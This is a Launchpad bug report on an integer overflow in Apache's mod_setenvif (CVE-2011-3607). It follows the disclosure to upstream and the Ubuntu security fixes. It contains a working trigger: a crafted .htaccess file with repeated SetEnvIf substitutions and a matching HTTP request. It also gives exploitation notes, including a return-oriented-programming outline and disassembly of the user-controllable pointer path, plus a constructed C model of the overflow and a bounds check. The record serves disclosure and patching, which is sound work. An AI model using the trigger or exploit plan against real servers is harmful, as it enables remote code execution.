Exploitable integer overflow on x86 in mod SetEnvIf, leading to buffer overwrite

Bug #811422 reported by halfdog
Affects             Status        Importance  Assigned to        Milestone
apache2 (Ubuntu)    Fix Released  Low         Unassigned
  Hardy             Fix Released  Low         Marc Deslauriers
  Lucid             Fix Released  Low         Marc Deslauriers
  Maverick          Fix Released  Low         Marc Deslauriers
  Natty             Fix Released  Low         Marc Deslauriers
  Oneiric           Fix Released  Low         Marc Deslauriers
  Precise           Fix Released  Low         Unassigned

Bug Description

Apache worker on oneiric, in server/util.c, function

AP_DECLARE(char *) ap_pregsub(apr_pool_t *p, const char *input,
                              const char *source, size_t nmatch,
                              ap_regmatch_t pmatch[])

contains exploitable integer overflow when calculating length of
buffer:

        else if (no < nmatch && pmatch[no].rm_so < pmatch[no].rm_eo) {
            len += pmatch[no].rm_eo - pmatch[no].rm_so;
        }

...

    dest = dst = apr_pcalloc(p, len + 1);

Can be triggered by placing .htaccess file on server with module
enabled:

SetEnvIf MyRequest "^(.*)$"
TestVar=$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$10123456789abcde
SetEnvIf TestVar "^(.*)$"
Test2Var=$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$10123456789abcdef0123456789abcdef0123456789abc
SetEnvIf Test2Var "^(.*)$"
Test3Var=$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1
SetEnvIf Test3Var "^(.*)$"
Test4Var=S$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1

Testrequest:

GET /test/file HTTP/1.1
Host: localhost
MyRequest: 0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF
Connection: close

Result: Allocates 2^6 * 2^6 * 2^6 * 2^6 * 2^8 + 1 = 2^32 + 1 bytes via
apr_pcalloc

Add some slack using "0123456789abcde" at end of expression to select if

        else if (no < nmatch && pmatch[no].rm_so < pmatch[no].rm_eo) {
            len = pmatch[no].rm_eo - pmatch[no].rm_so;
            memcpy(dst, source + pmatch[no].rm_so, len);
            dst += len;
        }

or while-loop around memcpy should segfault, usually at

        if (no > 9) { /* Ordinary character. */
            if (c == '\\' && (*src == '$' || *src == '&'))
                c = *src++;
            *dst++ = c;
        }

Ubuntu security was informed 20110715, no reply so far. When .htaccess was placed on server, exploitation seems to be possible on nonexec segments using 2 concurrent client requests over net. With return-oriented-programming with 3 blocks from (xchg eax/esp+ret; pop eax+ret, pop ebx,ecx,edx+ret; cd 0x80) should do the trick, but currently stability is not good enough. The main target to control IP is

#0 0x002cb36b in apr_brigade_cleanup () from /usr/lib/libaprutil-2.so.0
esi 0x46464646 1179010629
   0x002cb350 <+0>: push %ebp
   0x002cb351 <+1>: push %edi
   0x002cb352 <+2>: push %esi
   0x002cb353 <+3>: sub $0x10,%esp
   0x002cb356 <+6>: mov 0x20(%esp),%edi
   0x002cb35a <+10>: mov 0x4(%edi),%eax
   0x002cb35d <+13>: lea 0x4(%edi),%ebp
   0x002cb360 <+16>: cmp %ebp,%eax
   0x002cb362 <+18>: je 0x2cb393 <apr_brigade_cleanup+67>
   0x002cb364 <+20>: lea 0x0(%esi,%eiz,1),%esi
   0x002cb368 <+24>: mov 0x4(%edi),%esi -- user controllable
=> 0x002cb36b <+27>: mov 0x4(%esi),%eax
   0x002cb36e <+30>: mov (%esi),%edx
   0x002cb370 <+32>: mov %edx,(%eax) -- (esi) to (esi+4)
   0x002cb372 <+34>: mov (%esi),%eax
   0x002cb374 <+36>: mov 0x4(%esi),%edx
   0x002cb377 <+39>: mov %edx,0x4(%eax) -- (esi+4) to ((esi)+4)
   0x002cb37a <+42>: mov 0x8(%esi),%eax
   0x002cb37d <+45>: mov 0x18(%esi),%edx -- 0x18 value to stack
   0x002cb380 <+48>: mov %edx,(%esp)
   0x002cb383 <+51>: call *0xc(%eax)

where esi is user controllable and can be made pointing to other user-data blocks. The symlink attack from
http://www.halfdog.net/Security/2011/ApacheNoFollowSymlinkTimerace/ (issue number coming soon) might be useful to get the apache memory layout from /proc/<pid>/maps; an issue to suspend httpd when serving pipes (https://bugs.launchpad.net/ubuntu/+source/apache2/+bug/811417) might be helpful with a timing attack, but this is not yet proven.

# lsb_release -rd
Description: Ubuntu oneiric (development branch)
Release: 11.10

# apt-cache policy apache2-mpm-worker
apache2-mpm-worker:
  Installed: 2.2.19-1ubuntu1
  Candidate: 2.2.19-1ubuntu1
  Version table:
 *** 2.2.19-1ubuntu1 0
        500 http://archive.ubuntu.com/ubuntu/ oneiric/main i386 Packages
        100 /var/lib/dpkg/status
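
As an added illustration (not code from the bug report or from Apache), the following is a constructed 32-bit model of the length pass in ap_pregsub(): the unchecked accumulation that wraps, beside a checked variant that refuses the step that would wrap before anything is allocated. The helper names, the UINT32_MAX - 1 ceiling and the sample template are assumptions of this example, not the upstream patch.

```c
#include <stdint.h>
#include <string.h>
/* Constructed model (not Apache's code) of the length pass in ap_pregsub():
 * each "$n" in a SetEnvIf replacement adds the length of capture group n.
 * On 32-bit x86 size_t is 32 bits wide, which uint32_t models on any host. */
typedef struct { int rm_so, rm_eo; } match_t;
/* Length of the next template item: capture length for "$n", else 1 byte. */
static uint32_t item_len(const char **pp, const match_t *pm, size_t nmatch)
{
    const char *p = *pp;
    if (*p == '$' && p[1] >= '0' && p[1] <= '9') {
        size_t no = (size_t)(p[1] - '0');
        *pp = p + 2;
        return (no < nmatch && pm[no].rm_so < pm[no].rm_eo)
               ? (uint32_t)(pm[no].rm_eo - pm[no].rm_so) : 0;
    }
    *pp = p + 1;
    return 1;
}
/* Unchecked accumulation, as in the vulnerable code: wraps silently. */
uint32_t unchecked_len(const char *tmpl, const match_t *pm, size_t nmatch)
{
    uint32_t len = 0;
    while (*tmpl) len += item_len(&tmpl, pm, nmatch);
    return len;
}
/* Checked variant: refuse any step that would push len past UINT32_MAX - 1
 * (room for apr_pcalloc's "+ 1"); returns 1 on success, 0 on overflow. */
int checked_len(const char *tmpl, const match_t *pm, size_t nmatch, uint32_t *out)
{
    uint32_t len = 0;
    while (*tmpl) {
        uint32_t add = item_len(&tmpl, pm, nmatch);
        if (add > (UINT32_MAX - 1) - len) return 0;   /* would wrap */
        len += add;
    }
    *out = len;
    return 1;
}

/* Constructed scenario: 64 "$1" references, a 15-byte tail, 2^26-byte capture. */
#define R8 "$1$1$1$1$1$1$1$1"
#define TMPL R8 R8 R8 R8 R8 R8 R8 R8 "0123456789abcde"
static const match_t big[2] = { {0, 1 << 26}, {0, 1 << 26} };

/* 64 * 2^26 == 2^32 wraps to 0, so only the 15 tail bytes are counted. */
uint32_t demo_unchecked(void) { return unchecked_len(TMPL, big, 2); }
/* The same template is rejected before any allocation would take place. */
int demo_checked(void) { uint32_t n; return checked_len(TMPL, big, 2, &n); }
```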

Revision history for this message
halfdog (halfdog) wrote :

Read proc/<pid>/maps due to timerace https://bugs.launchpad.net/ubuntu/+source/apache2/+bug/811428 . Since attacker must have been able to place .htaccess on server, he might be able to place a symlink also.

Revision history for this message
Marc Deslauriers (mdeslaur) wrote :

Thanks for reporting this issue.

Could you please report this issue to the Apache Security Team, and possibly link the resulting bug report here.

Thanks.

Changed in apache2 (Ubuntu):
importance: Undecided → Low
Revision history for this message
Marc Deslauriers (mdeslaur) wrote :

See here for information on reporting this issue:
http://www.apache.org/security/

Revision history for this message
Jamie Strandboge (jdstrand) wrote :

What was the response from upstream?

Changed in apache2 (Ubuntu):
assignee: nobody → Jamie Strandboge (jdstrand)
status: New → Incomplete
Revision history for this message
halfdog (halfdog) wrote :

Sent mail to <email address hidden> 2011-07-15 (no reply) and again today:

Dear Apache Httpd Security Team,

It seems possible to execute arbitrary code via the bug reported
2011-07-15. Since this requires a crafted .htaccess file on the host,
this might not be a too big issue.

See

http://www.halfdog.net/Security/2011/ApacheModSetEnvIfIntegerOverflow/

for first draft of multi-thread exploit (url not published elsewhere).
Currently I'm trying to get more stable code executing using the
stop-regex approach and just a single thread.

I checked the reporting guidelines again today and found that there is a different security contact mail address mentioned. I'm not sure if something has changed at the apache website or I just picked up a dead address. Resending to <email address hidden>

Revision history for this message
halfdog (halfdog) wrote :

Got reply from apache-security, request to create advisory.

Updated bug information, placed an advisory stub at http://www.halfdog.net/Security/2011/ApacheModSetEnvIfIntegerOverflow/ , sent update to apache.

Revision history for this message
halfdog (halfdog) wrote :

Information from Joe Orton:

We'd prefer to discuss the appropriate fix for this on the public
mailing list, so could you publish your advisory as soon as is
convenient. We'll follow up with public discussion and patches as
appropriate.

Please use the CVE name CVE-2011-3607 for this issue.

Very good discussion:

http://www.gossamer-threads.com/lists/apache/dev/403775

visibility: private → public
Revision history for this message
halfdog (halfdog) wrote :

CVE-2011-3607 is fixed upstream in trunk, but not yet released: http://svn.apache.org/viewvc?view=revision&revision=1198940

Another CVE, CVE-2011-4415, was assigned by MITRE to the resource consumption / NULL-dereference issue.

Changed in apache2 (Ubuntu Hardy):
status: New → Confirmed
Changed in apache2 (Ubuntu Lucid):
status: New → Confirmed
Changed in apache2 (Ubuntu Maverick):
status: New → Confirmed
Changed in apache2 (Ubuntu Natty):
status: New → Confirmed
Changed in apache2 (Ubuntu Oneiric):
status: New → Confirmed
Changed in apache2 (Ubuntu Precise):
status: Incomplete → Fix Released
assignee: Jamie Strandboge (jdstrand) → nobody
Changed in apache2 (Ubuntu Hardy):
assignee: nobody → Marc Deslauriers (mdeslaur)
Changed in apache2 (Ubuntu Lucid):
assignee: nobody → Marc Deslauriers (mdeslaur)
Changed in apache2 (Ubuntu Maverick):
assignee: nobody → Marc Deslauriers (mdeslaur)
Changed in apache2 (Ubuntu Oneiric):
assignee: nobody → Marc Deslauriers (mdeslaur)
Changed in apache2 (Ubuntu Natty):
assignee: nobody → Marc Deslauriers (mdeslaur)
Changed in apache2 (Ubuntu Hardy):
importance: Undecided → Low
Changed in apache2 (Ubuntu Lucid):
importance: Undecided → Low
Changed in apache2 (Ubuntu Maverick):
importance: Undecided → Low
Changed in apache2 (Ubuntu Oneiric):
importance: Undecided → Low
Changed in apache2 (Ubuntu Natty):
importance: Undecided → Low
Revision history for this message
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package apache2 - 2.2.20-1ubuntu1.2

---------------
apache2 (2.2.20-1ubuntu1.2) oneiric-security; urgency=low

  * SECURITY UPDATE: arbitrary code execution via crafted SetEnvIf
    directive (LP: #811422)
    - debian/patches/215_CVE-2011-3607.dpatch: validate length in
      server/util.c.
    - CVE-2011-3607
  * SECURITY UPDATE: another mod_proxy reverse proxy exposure
    - debian/patches/216_CVE-2011-4317.dpatch: validate additional URIs in
      modules/mappers/mod_rewrite.c, modules/proxy/mod_proxy.c,
      server/protocol.c.
    - CVE-2011-4317
  * SECURITY UPDATE: denial of service via invalid cookie
    - debian/patches/217_CVE-2012-0021.dpatch: check name and value in
      modules/loggers/mod_log_config.c.
    - CVE-2012-0021
  * SECURITY UPDATE: denial of service and possible code execution via
    type field modification within a scoreboard shared memory segment
    - debian/patches/218_CVE-2012-0031.dpatch: check type field in
      server/scoreboard.c.
    - CVE-2012-0031
  * SECURITY UPDATE: cookie disclosure via Bad Request errors
    - debian/patches/219_CVE-2012-0053.dpatch: check lengths in
      server/protocol.c.
    - CVE-2012-0053
 -- Marc Deslauriers <email address hidden> Tue, 14 Feb 2012 09:35:36 -0500

Revision history for this message
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package apache2 - 2.2.17-1ubuntu1.5

---------------
apache2 (2.2.17-1ubuntu1.5) natty-security; urgency=low

  * SECURITY UPDATE: arbitrary code execution via crafted SetEnvIf
    directive (LP: #811422)
    - debian/patches/215_CVE-2011-3607.dpatch: validate length in
      server/util.c.
    - CVE-2011-3607
  * SECURITY UPDATE: another mod_proxy reverse proxy exposure
    - debian/patches/216_CVE-2011-4317.dpatch: validate additional URIs in
      modules/mappers/mod_rewrite.c, modules/proxy/mod_proxy.c,
      server/protocol.c.
    - CVE-2011-4317
  * SECURITY UPDATE: denial of service via invalid cookie
    - debian/patches/217_CVE-2012-0021.dpatch: check name and value in
      modules/loggers/mod_log_config.c.
    - CVE-2012-0021
  * SECURITY UPDATE: denial of service and possible code execution via
    type field modification within a scoreboard shared memory segment
    - debian/patches/218_CVE-2012-0031.dpatch: check type field in
      server/scoreboard.c.
    - CVE-2012-0031
  * SECURITY UPDATE: cookie disclosure via Bad Request errors
    - debian/patches/219_CVE-2012-0053.dpatch: check lengths in
      server/protocol.c.
    - CVE-2012-0053
 -- Marc Deslauriers <email address hidden> Tue, 14 Feb 2012 10:02:26 -0500

Revision history for this message
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package apache2 - 2.2.16-1ubuntu3.5

---------------
apache2 (2.2.16-1ubuntu3.5) maverick-security; urgency=low

  * SECURITY UPDATE: arbitrary code execution via crafted SetEnvIf
    directive (LP: #811422)
    - debian/patches/215_CVE-2011-3607.dpatch: validate length in
      server/util.c.
    - CVE-2011-3607
  * SECURITY UPDATE: another mod_proxy reverse proxy exposure
    - debian/patches/216_CVE-2011-4317.dpatch: validate additional URIs in
      modules/mappers/mod_rewrite.c, modules/proxy/mod_proxy.c,
      server/protocol.c.
    - CVE-2011-4317
  * SECURITY UPDATE: denial of service and possible code execution via
    type field modification within a scoreboard shared memory segment
    - debian/patches/218_CVE-2012-0031.dpatch: check type field in
      server/scoreboard.c.
    - CVE-2012-0031
  * SECURITY UPDATE: cookie disclosure via Bad Request errors
    - debian/patches/219_CVE-2012-0053.dpatch: check lengths in
      server/protocol.c.
    - CVE-2012-0053
 -- Marc Deslauriers <email address hidden> Tue, 14 Feb 2012 10:11:29 -0500

Revision history for this message
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package apache2 - 2.2.14-5ubuntu8.8

---------------
apache2 (2.2.14-5ubuntu8.8) lucid-security; urgency=low

  * SECURITY UPDATE: arbitrary code execution via crafted SetEnvIf
    directive (LP: #811422)
    - debian/patches/215_CVE-2011-3607.dpatch: validate length in
      server/util.c.
    - CVE-2011-3607
  * SECURITY UPDATE: another mod_proxy reverse proxy exposure
    - debian/patches/216_CVE-2011-4317.dpatch: validate additional URIs in
      modules/mappers/mod_rewrite.c, modules/proxy/mod_proxy.c,
      server/protocol.c.
    - CVE-2011-4317
  * SECURITY UPDATE: denial of service and possible code execution via
    type field modification within a scoreboard shared memory segment
    - debian/patches/218_CVE-2012-0031.dpatch: check type field in
      server/scoreboard.c.
    - CVE-2012-0031
  * SECURITY UPDATE: cookie disclosure via Bad Request errors
    - debian/patches/219_CVE-2012-0053.dpatch: check lengths in
      server/protocol.c.
    - CVE-2012-0053
 -- Marc Deslauriers <email address hidden> Tue, 14 Feb 2012 10:36:43 -0500

Revision history for this message
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package apache2 - 2.2.8-1ubuntu0.23

---------------
apache2 (2.2.8-1ubuntu0.23) hardy-security; urgency=low

  * SECURITY UPDATE: arbitrary code execution via crafted SetEnvIf
    directive (LP: #811422)
    - debian/patches/220_CVE-2011-3607.dpatch: validate length in
      server/util.c.
    - CVE-2011-3607
  * SECURITY UPDATE: another mod_proxy reverse proxy exposure
    - debian/patches/221_CVE-2011-4317.dpatch: validate additional URIs in
      modules/mappers/mod_rewrite.c, modules/proxy/mod_proxy.c,
      server/protocol.c.
    - CVE-2011-4317
  * SECURITY UPDATE: denial of service and possible code execution via
    type field modification within a scoreboard shared memory segment
    - debian/patches/222_CVE-2012-0031.dpatch: check type field in
      server/scoreboard.c.
    - CVE-2012-0031
  * SECURITY UPDATE: cookie disclosure via Bad Request errors
    - debian/patches/223_CVE-2012-0053.dpatch: check lengths in
      server/protocol.c.
    - CVE-2012-0053
 -- Marc Deslauriers <email address hidden> Tue, 14 Feb 2012 10:49:11 -0500

Changed in apache2 (Ubuntu Hardy):
status: Confirmed → Fix Released
Changed in apache2 (Ubuntu Lucid):
status: Confirmed → Fix Released
Changed in apache2 (Ubuntu Maverick):
status: Confirmed → Fix Released
Changed in apache2 (Ubuntu Natty):
status: Confirmed → Fix Released
Changed in apache2 (Ubuntu Oneiric):
status: Confirmed → Fix Released